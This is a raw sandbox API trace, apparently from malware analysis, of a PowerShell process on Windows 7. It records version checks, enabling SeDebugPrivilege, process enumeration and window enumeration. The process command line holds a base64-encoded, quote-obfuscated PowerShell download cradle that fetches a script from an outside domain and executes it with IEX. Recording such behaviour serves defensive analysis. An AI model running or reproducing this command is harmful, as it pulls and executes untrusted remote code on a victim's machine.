	[0848.975] CoTaskMemAlloc (cb=0x3b) returned 0x4f0a60
	[0848.975] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c82e168, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c82e168) returned 0x4550
	[0848.975] CoTaskMemFree (pv=0x4f0a60) 
	[0848.978] GetCurrentProcess () returned 0xffffffffffffffff
	[0848.978] GetCurrentProcess () returned 0xffffffffffffffff
	[0848.979] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c82e248, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c82e248*=0x34c) returned 1

Process:
	id = "51"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x728e9000"
	os_pid = "0xe7c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 293
	os_tid = 0xe80

	[0536.494] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0540.666] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0540.666] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0540.666] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0540.666] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0549.667] GetVersionExW (in: lpVersionInformation=0x12df60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12df60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0549.669] GetVersionExW (in: lpVersionInformation=0x12df60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12df60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0549.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0549.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0549.684] GetVersionExW (in: lpVersionInformation=0x12dcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0549.685] SetErrorMode (uMode=0x1) returned 0x1
	[0549.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12de30 | out: lpFileInformation=0x12de30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0549.687] SetErrorMode (uMode=0x1) returned 0x1
	[0549.691] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12e0a0 | out: lpdwHandle=0x12e0a0) returned 0x94c
	[0549.693] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2be72d8 | out: lpData=0x2be72d8) returned 1
	[0549.696] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12e018, puLen=0x12e010 | out: lplpBuffer=0x12e018*=0x2be7374, puLen=0x12e010) returned 1
	[0549.698] lstrlenW (lpString="䅁") returned 1
	[0551.284] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x2be7450, puLen=0x12df80) returned 1
	[0551.284] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0551.287] CoTaskMemAlloc (cb=0x2e) returned 0x305de0
	[0551.287] lstrcpyW (in: lpString1=0x305de0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0551.288] CoTaskMemFree (pv=0x305de0) 
	[0551.288] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x2be74a4, puLen=0x12df80) returned 1
	[0551.288] lstrlenW (lpString="System.Management.Automation") returned 28
	[0551.288] CoTaskMemAlloc (cb=0x3c) returned 0x239860
	[0551.288] lstrcpyW (in: lpString1=0x239860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0551.288] CoTaskMemFree (pv=0x239860) 
	[0551.288] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x2be7500, puLen=0x12df80) returned 1
	[0551.288] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0551.288] CoTaskMemAlloc (cb=0x20) returned 0x306320
	[0551.288] lstrcpyW (in: lpString1=0x306320, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0551.288] CoTaskMemFree (pv=0x306320) 
	[0551.288] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x2be7540, puLen=0x12df80) returned 1
	[0551.288] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0551.288] CoTaskMemAlloc (cb=0x44) returned 0x239860
	[0551.289] lstrcpyW (in: lpString1=0x239860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0551.289] CoTaskMemFree (pv=0x239860) 
	[0551.289] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x2be75a8, puLen=0x12df80) returned 1
	[0551.289] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0551.289] CoTaskMemAlloc (cb=0x76) returned 0x2a0660
	[0551.289] lstrcpyW (in: lpString1=0x2a0660, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0551.289] CoTaskMemFree (pv=0x2a0660) 
	[0551.289] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x2be7644, puLen=0x12df80) returned 1
	[0551.289] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0551.289] CoTaskMemAlloc (cb=0x44) returned 0x239860
	[0551.289] lstrcpyW (in: lpString1=0x239860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0551.289] CoTaskMemFree (pv=0x239860) 
	[0551.289] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x2be76a8, puLen=0x12df80) returned 1
	[0551.289] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0551.289] CoTaskMemAlloc (cb=0x58) returned 0x2c5680
	[0551.289] lstrcpyW (in: lpString1=0x2c5680, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0551.289] CoTaskMemFree (pv=0x2c5680) 
	[0551.289] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x2be7724, puLen=0x12df80) returned 1
	[0551.289] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0551.289] CoTaskMemAlloc (cb=0x20) returned 0x306320
	[0551.290] lstrcpyW (in: lpString1=0x306320, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0551.290] CoTaskMemFree (pv=0x306320) 
	[0551.290] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x2be73cc, puLen=0x12df80) returned 1
	[0551.290] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0551.290] CoTaskMemAlloc (cb=0x66) returned 0x27c4b0
	[0551.290] lstrcpyW (in: lpString1=0x27c4b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0551.290] CoTaskMemFree (pv=0x27c4b0) 
	[0551.290] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x0, puLen=0x12df80) returned 0
	[0551.290] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x0, puLen=0x12df80) returned 0
	[0551.290] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12df88, puLen=0x12df80 | out: lplpBuffer=0x12df88*=0x0, puLen=0x12df80) returned 0
	[0551.290] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12df58, puLen=0x12df50 | out: lplpBuffer=0x12df58*=0x2be7374, puLen=0x12df50) returned 1
	[0551.291] CoTaskMemAlloc (cb=0x204) returned 0x2a4dc0
	[0551.291] VerLanguageNameW (in: wLang=0x0, szLang=0x2a4dc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0551.294] CoTaskMemFree (pv=0x2a4dc0) 
	[0551.294] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\", lplpBuffer=0x12dfa8, puLen=0x12dfa0 | out: lplpBuffer=0x12dfa8*=0x2be7300, puLen=0x12dfa0) returned 1
	[0551.300] GetCurrentProcessId () returned 0xe7c
	[0551.317] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12ced0 | out: lpLuid=0x12ced0*(LowPart=0x14, HighPart=0)) returned 1
	[0553.233] GetCurrentProcess () returned 0xffffffffffffffff
	[0553.234] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12cef0 | out: TokenHandle=0x12cef0*=0x2e4) returned 1
	[0553.235] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2beab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0553.236] CloseHandle (hObject=0x2e4) returned 1
	[0553.240] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe7c) returned 0x2e4
	[0553.250] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2beabb8, cb=0x200, lpcbNeeded=0x12df08 | out: lphModule=0x2beabb8, lpcbNeeded=0x12df08) returned 1
	[0553.252] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2beae28, cb=0x18 | out: lpmodinfo=0x2beae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0553.253] CoTaskMemAlloc (cb=0x804) returned 0x30dcd0
	[0553.253] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x30dcd0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0553.254] CoTaskMemFree (pv=0x30dcd0) 
	[0553.254] CoTaskMemAlloc (cb=0x804) returned 0x30dcd0
	[0553.255] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x30dcd0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0553.255] CoTaskMemFree (pv=0x30dcd0) 
	[0553.256] CloseHandle (hObject=0x2e4) returned 1
	[0553.264] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xe7c) returned 0x2e4
	[0553.265] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x12e038 | out: lpExitCode=0x12e038*=0x103) returned 1
	[0555.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12beb088, Length=0x20000, ResultLength=0x12e000 | out: SystemInformation=0x12beb088, ResultLength=0x12e000*=0x32d70) returned 0xc0000004
	[0555.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c0b0b8, Length=0x35570, ResultLength=0x12e000 | out: SystemInformation=0x12c0b0b8, ResultLength=0x12e000*=0x32d70) returned 0x0
	[0555.442] EnumWindows (lpEnumFunc=0x2b666ac, lParam=0x0) returned 1
	[0557.926] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.926] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x558
	[0557.926] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.926] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.926] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.926] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x538
	[0557.926] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.927] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x778
	[0557.927] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x778
	[0557.927] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.927] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.927] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.927] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.927] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.928] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.928] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.928] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.928] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x460
	[0557.928] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.928] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.928] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1a78
	[0557.929] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1b90
	[0557.929] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1b04
	[0557.929] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1b34
	[0557.929] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1b64
	[0557.929] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1bb0
	[0557.929] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1acc
	[0557.929] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1a2c
	[0557.929] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x19a8
	[0557.930] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1944
	[0557.930] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x18c8
	[0557.930] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x18ac
	[0557.930] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x18ec
	[0557.930] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1898
	[0557.930] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc98
	[0557.930] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x153c
	[0557.931] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1808
	[0557.931] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x12a4
	[0557.931] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1740
	[0557.931] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x16c4
	[0557.931] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1820
	[0557.931] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x16ac
	[0557.931] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1858
	[0557.932] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1664
	[0557.932] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x10b4
	[0557.932] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x10ac
	[0557.932] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x10ec
	[0557.932] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1068
	[0557.932] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x17e0
	[0557.932] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x102c
	[0557.932] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x17a4
	[0557.933] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1050
	[0557.933] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1694
	[0557.933] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1770
	[0557.933] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1720
	[0557.933] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x165c
	[0557.933] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1578
	[0557.933] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x16c0
	[0557.934] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x161c
	[0557.934] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1638
	[0557.934] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x15c8
	[0557.934] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1554
	[0557.934] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1674
	[0557.934] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1520
	[0557.934] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x14bc
	[0557.934] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf8c
	[0557.935] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe9c
	[0557.935] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1434
	[0557.935] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x14ec
	[0557.935] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xfcc
	[0557.935] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x12ac
	[0557.935] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1484
	[0557.935] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x934
	[0557.935] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc0c
	[0557.936] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb08
	[0557.936] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x948
	[0557.936] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1178
	[0557.936] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x13e0
	[0557.936] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xcd0
